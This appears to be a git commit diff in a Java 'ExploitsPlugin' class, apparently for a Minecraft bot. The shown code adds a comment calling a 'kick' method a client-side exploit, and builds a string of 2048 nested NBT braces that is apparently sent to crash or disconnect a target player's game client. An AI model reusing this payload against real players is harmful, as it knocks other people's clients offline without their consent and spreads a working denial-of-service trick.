add another fart

This commit is contained in:
Chayapak 2023-05-02 15:05:20 +07:00
parent ffd618f157
commit 92da178c80

View file

@ -13,7 +13,7 @@ public class ExploitsPlugin {
} }
public void kick (UUID uuid) { public void kick (UUID uuid) {
// this is a client-side exploit so i think leaking it shouldn't be a problem..,.,
String nbt = "{a:".repeat(2048) + String nbt = "{a:".repeat(2048) +
"''" + "''" +
"}".repeat(2048); "}".repeat(2048);